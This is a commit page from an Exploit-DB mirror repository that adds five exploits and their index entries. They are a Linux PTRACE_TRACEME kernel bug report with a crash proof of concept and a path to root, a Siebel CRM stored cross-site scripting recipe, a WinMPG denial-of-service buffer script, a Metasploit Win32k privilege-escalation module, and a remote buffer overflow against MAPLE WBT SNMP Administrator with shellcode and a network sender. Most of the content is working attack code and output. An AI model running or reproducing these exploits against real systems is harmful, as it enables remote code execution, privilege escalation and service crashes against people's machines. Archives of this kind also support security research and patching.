bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-07-18

Browse source 
5 changes to exploits/shellcodes

WinMPG iPod Convert 3.0 - 'Register' Denial of Service
Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME
Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit)

MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow

Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting
This commit is contained in:
Offensive Security 2019-07-18 05:02:15 +00:00
parent 2935a5c0af
commit 40febc17ca
6 changed files with 533 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

196
exploits/linux/local/47133.txt Normal file
View file

@ -0,0 +1,196 @@
== Summary ==
This bug report describes two issues introduced by commit 64b875f7ac8a ("ptrace:
Capture the ptracer's creds not PT_PTRACE_CAP", introduced in v4.10 but also
stable-backported to older versions). I will send a suggested patch in a minute
("ptrace: Fix ->ptracer_cred handling for PTRACE_TRACEME").
When called for PTRACE_TRACEME, ptrace_link() would obtain an RCU reference
to the parent's objective credentials, then give that pointer to
get_cred(). However, the object lifetime rules for things like struct cred
do not permit unconditionally turning an RCU reference into a stable
reference.
PTRACE_TRACEME records the parent's credentials as if the parent was acting
as the subject, but that's not the case. If a malicious unprivileged child
uses PTRACE_TRACEME and the parent is privileged, and at a later point, the
parent process becomes attacker-controlled (because it drops privileges and
calls execve()), the attacker ends up with control over two processes with
a privileged ptrace relationship, which can be abused to ptrace a suid
binary and obtain root privileges.
== Long bug description ==
While I was trying to refactor the cred_guard_mutex logic, I stumbled over the
following issues:
ptrace relationships can be set up in two ways: Either the tracer attaches to
another process (PTRACE_ATTACH/PTRACE_SEIZE), or the tracee forces its parent to
attach to it (PTRACE_TRACEME).
When a tracee goes through a privilege-gaining execve(), the kernel checks
whether the ptrace relationship is privileged. If it is not, the
privilege-gaining effect of execve is suppressed.
The idea here is that a privileged tracer (e.g. if root runs "strace" on
some process) is allowed to trace through setuid/setcap execution, but an
unprivileged tracer must not be allowed to do that, since it could otherwise
inject arbitrary code into privileged processes.
In the PTRACE_ATTACH/PTRACE_SEIZE case, the tracer's credentials are recorded at
the time it calls PTRACE_ATTACH/PTRACE_SEIZE; later, when the tracee goes
through execve(), it is checked whether the recorded credentials are capable
over the tracee's user namespace.
But in the PTRACE_TRACEME case, the kernel also records _the tracer's_
credentials, even though the tracer is not requesting the operation. There are
two problems with that.
First, there is an object lifetime issue:
ptrace_traceme() -> ptrace_link() grabs __task_cred(new_parent) in an RCU
read-side critical section, then passes the creds to __ptrace_link(), which
calls get_cred() on them. If the parent concurrently switches its creds (e.g.
via setresuid()), the creds' refcount may already be zero, in which case
put_cred_rcu() will already have been scheduled. The kernel usually manages to
panic() before memory corruption occurs here using the following code in
put_cred_rcu(); however, I think memory corruption would also be possible if
this code races exactly the right way.
if (atomic_read(&cred->usage) != 0)
panic("CRED: put_cred_rcu() sees %p with usage %d\n",
cred, atomic_read(&cred->usage));
A simple PoC to trigger this bug:
============================
#define _GNU_SOURCE
#include <unistd.h>
#include <signal.h>
#include <sched.h>
#include <err.h>
#include <sys/prctl.h>
#include <sys/types.h>
#include <sys/ptrace.h>
int grandchild_fn(void *dummy) {
if (ptrace(PTRACE_TRACEME, 0, NULL, NULL))
err(1, "traceme");
return 0;
}
int main(void) {
pid_t child = fork();
if (child == -1) err(1, "fork");
/* child */
if (child == 0) {
static char child_stack[0x100000];
prctl(PR_SET_PDEATHSIG, SIGKILL);
while (1) {
if (clone(grandchild_fn, child_stack+sizeof(child_stack), CLONE_FILES|CLONE_FS|CLONE_IO|CLONE_PARENT|CLONE_VM|CLONE_SIGHAND|CLONE_SYSVSEM|CLONE_VFORK, NULL) == -1)
err(1, "clone failed");
}
}
/* parent */
uid_t uid = getuid();
while (1) {
if (setresuid(uid, uid, uid)) err(1, "setresuid");
}
}
============================
Result:
============================
[ 484.576983] ------------[ cut here ]------------
[ 484.580565] kernel BUG at kernel/cred.c:138!
[ 484.585278] Kernel panic - not syncing: CRED: put_cred_rcu() sees 000000009e024125 with usage 1
[ 484.589063] CPU: 1 PID: 1908 Comm: panic Not tainted 5.2.0-rc7 #431
[ 484.592410] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
[ 484.595843] Call Trace:
[ 484.598688] <IRQ>
[ 484.601451] dump_stack+0x7c/0xbb
[...]
[ 484.607349] panic+0x188/0x39a
[...]
[ 484.622650] put_cred_rcu+0x112/0x120
[...]
[ 484.628580] rcu_core+0x664/0x1260
[...]
[ 484.646675] __do_softirq+0x11d/0x5dd
[ 484.649523] irq_exit+0xe3/0xf0
[ 484.652374] smp_apic_timer_interrupt+0x103/0x320
[ 484.655293] apic_timer_interrupt+0xf/0x20
[ 484.658187] </IRQ>
[ 484.660928] RIP: 0010:do_error_trap+0x8d/0x110
[ 484.664114] Code: da 4c 89 ee bf 08 00 00 00 e8 df a5 09 00 3d 01 80 00 00 74 54 48 8d bb 90 00 00 00 e8 cc 8e 29 00 f6 83 91 00 00 00 02 75 2b <4c> 89 7c 24 40 44 8b 4c 24 04 48 83 c4 08 4d 89 f0 48 89 d9 4c 89
[ 484.669035] RSP: 0018:ffff8881ddf2fd58 EFLAGS: 00000246 ORIG_RAX: ffffffffffffff13
[ 484.672784] RAX: 0000000000000000 RBX: ffff8881ddf2fdb8 RCX: ffffffff811144dd
[ 484.676450] RDX: 0000000000000007 RSI: dffffc0000000000 RDI: ffff8881eabc4bf4
[ 484.680306] RBP: 0000000000000006 R08: fffffbfff0627a02 R09: 0000000000000000
[ 484.684033] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000004
[ 484.687697] R13: ffffffff82618dc0 R14: 0000000000000000 R15: ffffffff810c99d5
[...]
[ 484.700626] do_invalid_op+0x31/0x40
[...]
[ 484.707183] invalid_op+0x14/0x20
[ 484.710499] RIP: 0010:__put_cred+0x65/0x70
[ 484.713598] Code: 48 8d bd 90 06 00 00 e8 49 e2 1f 00 48 3b 9d 90 06 00 00 74 19 48 8d bb 90 00 00 00 48 c7 c6 50 98 0c 81 5b 5d e9 ab 1f 08 00 <0f> 0b 0f 0b 0f 0b 0f 1f 44 00 00 55 53 48 89 fb 48 81 c7 90 06 00
[ 484.718633] RSP: 0018:ffff8881ddf2fe68 EFLAGS: 00010202
[ 484.722407] RAX: 0000000000000001 RBX: ffff8881f38a4600 RCX: ffffffff810c9987
[ 484.726147] RDX: 0000000000000003 RSI: dffffc0000000000 RDI: ffff8881f38a4600
[ 484.730049] RBP: ffff8881f38a4600 R08: ffffed103e7148c1 R09: ffffed103e7148c1
[ 484.733857] R10: 0000000000000001 R11: ffffed103e7148c0 R12: ffff8881eabc4380
[ 484.737923] R13: 00000000000003e8 R14: ffff8881f1a5b000 R15: ffff8881f38a4778
[...]
[ 484.748760] commit_creds+0x41c/0x520
[...]
[ 484.756115] __sys_setresuid+0x1cb/0x1f0
[ 484.759634] do_syscall_64+0x5d/0x260
[ 484.763024] entry_SYSCALL_64_after_hwframe+0x49/0xbe
[ 484.766441] RIP: 0033:0x7fcab9bb4845
[ 484.769839] Code: 0f 1f 44 00 00 48 83 ec 38 64 48 8b 04 25 28 00 00 00 48 89 44 24 28 31 c0 8b 05 a6 8e 0f 00 85 c0 75 2a b8 75 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 53 48 8b 4c 24 28 64 48 33 0c 25 28 00 00 00
[ 484.775183] RSP: 002b:00007ffe01137aa0 EFLAGS: 00000246 ORIG_RAX: 0000000000000075
[ 484.779226] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fcab9bb4845
[ 484.783057] RDX: 00000000000003e8 RSI: 00000000000003e8 RDI: 00000000000003e8
[ 484.787101] RBP: 00007ffe01137af0 R08: 0000000000000000 R09: 00007fcab9caf500
[ 484.791045] R10: fffffffffffff4d4 R11: 0000000000000246 R12: 00005573b2f240b0
[ 484.794891] R13: 00007ffe01137bd0 R14: 0000000000000000 R15: 0000000000000000
[ 484.799171] Kernel Offset: disabled
[ 484.802932] ---[ end Kernel panic - not syncing: CRED: put_cred_rcu() sees 000000009e024125 with usage 1 ]---
============================
The second problem is that, because the PTRACE_TRACEME case grabs the
credentials of a potentially unaware tracer, it can be possible for a normal
user to create and use a ptrace relationship that is marked as privileged even
though no privileged code ever requested or used that ptrace relationship.
This requires the presence of a setuid binary with certain behavior: It has to
drop privileges and then become dumpable again (via prctl() or execve()).
- task A: fork()s a child, task B
- task B: fork()s a child, task C
- task B: execve(/some/special/suid/binary)
- task C: PTRACE_TRACEME (creates privileged ptrace relationship)
- task C: execve(/usr/bin/passwd)
- task B: drop privileges (setresuid(getuid(), getuid(), getuid()))
- task B: become dumpable again (e.g. execve(/some/other/binary))
- task A: PTRACE_ATTACH to task B
- task A: use ptrace to take control of task B
- task B: use ptrace to take control of task C
Polkit's pkexec helper fits this pattern. On a typical desktop system, any
process running under an active local session can invoke some helpers through
pkexec (see configuration in /usr/share/polkit-1/actions, search for <action>s
that specify <allow_active>yes</allow_active> and
<annotate key="org.freedesktop.policykit.exec.path">...</annotate>).
While pkexec is normally used to run programs as root, pkexec actually allows
its caller to specify the user to run a command as with --user, which permits
using pkexec to run a command as the user who executed pkexec. (Which is kinda
weird... why would I want to run pkexec helpers as more than one fixed user?)
I have attached a proof-of-concept that works on Debian 10 running a distro
kernel and the XFCE desktop environment; if you use a different desktop
environment, you may have to add a path to the `helpers` array in the PoC. When
you compile and run it in an active local session, you should get a root shell
within a second.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip

35
exploits/linux/webapps/47132.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting
# Date: 2019-07-17
# Exploit Author: Sarath Nair aka AceNeon13
# Contact: @AceNeon13
# Vendor Homepage: www.oracle.com
# Software Link: https://www.oracle.com/applications/siebel/
# Version: Siebel CRM (UI Framework) Version 19.0 and prior
# CVE: N/A
# Greetings: Deepu.tv
# PoC Exploit: Persistent Cross Site Scripting by Insecure File Upload
-----------------------------------------------------------------------
Vulnerable URL: http://<Siebel_Application>/finsadm_enu/start.swe?SWECmd=GotoView&SWEView=Activity+Attachment+View
#Steps to exploit the issue:
#1. Login to the CRM application and navigate to Activities and click on All Activities.
#2. Edit one of the existing activity, or create a new one.
#3. Use the New File menu in attachments section to upload an HTML file with JavaScript payload (via a proxy tool).
#4. JavaScript payload will be triggered/rendered upon the victim user views the attached file.
# Description: The Siebel CRM application allows its users to upload any file types in most of the available file upload functionalities, later on, the uploaded file can be downloaded by another user with the appropriate privileges as part of the workflow. As such, it was possible to upload file with the “html” extension, (containing html and JavaScript code) thereby allowing to also perform Persistent Cross Site Scripting attack.
# Impact: Cross-Site Scripting attacks do not target the server but rather its users. A hypothetical attacker could use the web server in order to trick other users into unwillingly executing malicious code saved on the server with XSS payload. The impacts of such attack can range from the disclosure of the users sensitive information to execution of arbitrary code on the target users system.
# Solution: Apply the Oracle Siebel CRM patch released on 16 July 2019
########################################
# Vulnerability Disclosure Timeline:
2017-December-23: Discovered vulnerability
2017-December-25: Vendor Notification
2017-December-27: Vendor Response/Feedback
2019-July-16: Vendor Fix/Patch
2019-July-17: Public Disclosure
########################################
Warm regards,
Sarath Nair

26
exploits/windows/dos/47131.py Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: WinMPG iPod Convert 3.0 - 'Register' Denial of Service
# Date: 2019-07-16
# Vendor Homepage:http://www.winmpg.com
# Software Link: https://www.techspot.com/downloads/downloadnow/6192/?evp=d62142990e9320a4e811b283fdcc4060&file=
# Exploit Author: stresser
# Tested Version: 3.0
# Tested on: Windows XP SP3 EN
# 1.- Run python code :WinMPG.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open WinMPG and Click 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and User Code'
# 5.- Click 'Ok'and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 6000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

106
exploits/windows/local/47134.rb Executable file
View file

@ -0,0 +1,106 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'Windows NtUserSetWindowFNID Win32k User Callback',
'Description' => %q{
An elevation of privilege vulnerability exists in Windows when the Win32k component
fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability."
This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows
Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2,
Windows 10, Windows 10 Servers.
This module is tested against Windows 10 v1703 x86.
},
'License' => MSF_LICENSE,
'Author' => [
'ze0r', # Exploit analysis and PoC
'Kaspersky Lab', # Vulnerability discovery/detection
'Jacob Robles' # Metasploit module
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'Targets' => [
[ 'Windows 10 v1703 (Build 15063) x86', {
'UniqueProcessIdOffset' => 180,
'TokenOffset' => 252,
'Version' => 'Windows 10 (Build 15063)'
}
]
],
'References' => [
['CVE', '2018-8453'],
['URL', 'https://github.com/ze0r/cve-2018-8453-exp'],
['URL', 'https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig'],
['URL', 'https://mp.weixin.qq.com/s/dcbUeegM0BqErtDufOXfoQ'],
['URL', 'https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/'],
['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453']
],
'Notes' => {
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],
'Stability' => [CRASH_OS_RESTARTS]
},
'DisclosureDate' => '2018-10-09',
'DefaultTarget' => 0
))
end
def target_info
fail_with(Failure::None, 'Session is already elevated') if is_system?
unless sysinfo['OS'].start_with?(target['Version']) && sysinfo['Architecture'] == 'x86'
fail_with(Failure::NoTarget, 'Target is not compatible with exploit')
end
end
def write_file_to_target(fname, data)
tempdir = session.sys.config.getenv('TEMP')
file_loc = "#{tempdir}\\#{fname}"
vprint_warning("Attempting to write #{fname} to #{tempdir}")
write_file(file_loc, data)
vprint_good("#{fname} written")
file_loc
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful")
end
def exploit
target_info
exe_name = 'CVE-2018-8453.exe'
exe_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8453', exe_name)
vprint_status("Reading payload from file #{exe_path}")
raw = File.read(exe_path)
tmp_exe = "#{Rex::Text.rand_text_alphanumeric(10)}.exe"
vprint_status("Uploading exploit exe as: #{tmp_exe}")
exe_rpath = write_file_to_target(tmp_exe, raw)
register_file_for_cleanup(exe_rpath)
tmp_payload = "#{Rex::Text.rand_text_alpha(6..14)}.exe"
payload_rpath = write_file_to_target(tmp_payload, generate_payload_exe)
vprint_status("Uploading payload #{tmp_payload}")
register_file_for_cleanup(payload_rpath)
command = "\"#{exe_rpath}\" \"#{payload_rpath}\" #{target['UniqueProcessIdOffset']} #{target['TokenOffset']}"
vprint_status("Executing command: #{command}")
session.sys.process.execute(command, nil, {'Hidden' => false})
print_good('Exploit finished, wait for privileged payload execution to complete.')
end
end

165
exploits/windows/remote/47130.txt Normal file
View file

@ -0,0 +1,165 @@
# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow
# Author: hyp3rlinx
# Discovery Date: 2019-07-17
# Vendor Homepage: www.computerlab.com
# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager
# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
# Tested on OS: Windows
# CVE: CVE-2019-13577
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt
[+] ISR: Apparition Security
[Vendor]
www.computerlab.com
[Product]
MAPLE Computer WBT SNMP Administrator (Thin Client Administrator)
v2.0.195.15
https://www.computerlab.com/index.php/downloads/category/27-device-manager
ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
SnmpSetup.195.15.EXE - MD5 Hash: a3913aae166c11ddd21dca437e78c3f4
The CLI Thin Client Manager is designed to provide remote management and control of CLI Thin Clients.
This software is built on the TCP/IP industry standard SNMP (Simple Network Communication Protocol).
Agents are built into the clients for remote management and configuration.
[Vulnerability Type]
Unauthenticated Remote Buffer Overflow Code Execution 0day
[CVE Reference]
CVE-2019-13577
[Security Issue]
SnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an Unauthenticated Remote Buffer Overflow via a long string to the CE Remote feature listening on Port 987.
This will overwrite data on the stack/registers and allow for control of the programs execution flow resulting in attacker supplied remote code execution.
Authentication is not required for this exploit.
This program seems to be packed using ASPack v2.12 and can be difficult to unpack because it uses self-modifying code.
When installing the vulnerable program if asks for a serial number just enter a value of "1" or something.
Upon launching the program if any errors occur try right click SnmpAdm.exe and run it as Admin.
Interestingly, it seems to drop DLLs with .tmp extensions in AppData\Local\Temp directory, make OS system files viewable in explorer to see them.
e.g. C:\Users\blah\AppData\Local\Temp\~ip6B92.tmp
ASLR / SEH all set to False helping to make exploit more portable.
CALL EBX
10008FB3 0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364 (C:\Program Files (x86)\SnmpAdm\ipwSNMPv5.dll)
Stack dump:
EAX 41414141
ECX 0018FEFC
EDX 0018FF10
EBX 022DDA78 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 0018FECC
EBP 0018FEF4
ESI 0018FF10
EDI 0018FEFC
EIP 41414141
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_NO_SCROLLBARS (000005A7)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
[Exploit/POC]
from socket import *
import struct,sys,argparse
#MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15
#CVE-2019-13577
#Remote Buffer Overflow 0day
#hyp3rlinx - ApparitionSec
#Pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
eip = struct.pack("<L", 0x10008fb3) #JMP EBX
popebx = struct.pack("<L", 0x022C0012) #5B POP EBX
buf0="B"*693704
buf1=eip
buf2=popebx+sc+"R"*899+"W"*23975
payload=buf0+buf1+buf2
def doit(IP,payload):
try:
s=socket(AF_INET, SOCK_STREAM)
s.connect((IP, 987))
s.send(payload)
print "CVE-2019-13577 - WBT SNMP Administrator Buffer Overflow 0day."
print "hyp3rlinx"
s.close()
except Exception as e:
print str(e)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ipaddress", help="IP of Target CVE-2019-13577")
return parser.parse_args()
def main(args):
doit(args.ipaddress,payload)
if __name__ == "__main__":
if not len(sys.argv) > 1:
print "[*] No args supplied see Help -h"
exit()
main(parse_args())
[POC Video URL]
https://www.youtube.com/watch?v=THMqueCIrFw
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: July 10, 2019
Second vendor notification attempt: July 13, 2019
No vendor replies.
July 17, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

5
files_exploits.csv
View file

@ -6510,6 +6510,7 @@ id,file,description,date,author,type,platform,port
47119,exploits/android/dos/47119.txt,"Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write",2019-07-15,"Marcin Kozlowski",dos,android,
47120,exploits/windows/dos/47120.rb,"Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service (Metasploit)",2019-07-15,"RAMELLA Sebastien",dos,windows,3389
47127,exploits/windows/dos/47127.txt,"Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection",2019-07-16,hyp3rlinx,dos,windows,
47131,exploits/windows/dos/47131.py,"WinMPG iPod Convert 3.0 - 'Register' Denial of Service",2019-07-17,stresser,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10596,6 +10597,8 @@ id,file,description,date,author,type,platform,port
47122,exploits/windows/local/47122.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)",2019-07-16,blackleitus,local,windows,
47126,exploits/windows/local/47126.py,"DameWare Remote Support 12.0.0.509 - 'Host' Buffer Overflow (SEH)",2019-07-16,"Xavi Beltran",local,windows,
47128,exploits/windows/local/47128.rb,"Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)",2019-07-16,Metasploit,local,windows,
47133,exploits/linux/local/47133.txt,"Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME",2019-07-17,"Google Security Research",local,linux,
47134,exploits/windows/local/47134.rb,"Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit)",2019-07-17,Metasploit,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17555,6 +17558,7 @@ id,file,description,date,author,type,platform,port
47080,exploits/unix/remote/47080.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)",2019-07-07,"Brian Peters",remote,unix,80
47114,exploits/multiple/remote/47114.rb,"Xymon 4.3.25 - useradm Command Execution (Metasploit)",2019-07-12,Metasploit,remote,multiple,
47129,exploits/linux/remote/47129.rb,"PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)",2019-07-16,Metasploit,remote,linux,
47130,exploits/windows/remote/47130.txt,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow",2019-07-17,hyp3rlinx,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41507,3 +41511,4 @@ id,file,description,date,author,type,platform,port
47123,exploits/linux/webapps/47123.txt,"CentOS Control Web Panel 0.9.8.836 - Authentication Bypass",2019-07-16,"Pongtorn Angsuchotmetee",webapps,linux,
47124,exploits/linux/webapps/47124.txt,"CentOS Control Web Panel 0.9.8.836 - Privilege Escalation",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux,
47125,exploits/linux/webapps/47125.txt,"CentOS Control Web Panel 0.9.8.838 - User Enumeration",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux,
47132,exploits/linux/webapps/47132.txt,"Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting",2019-07-17,"Sarath Nair",webapps,linux,

Can't render this file because it is too large.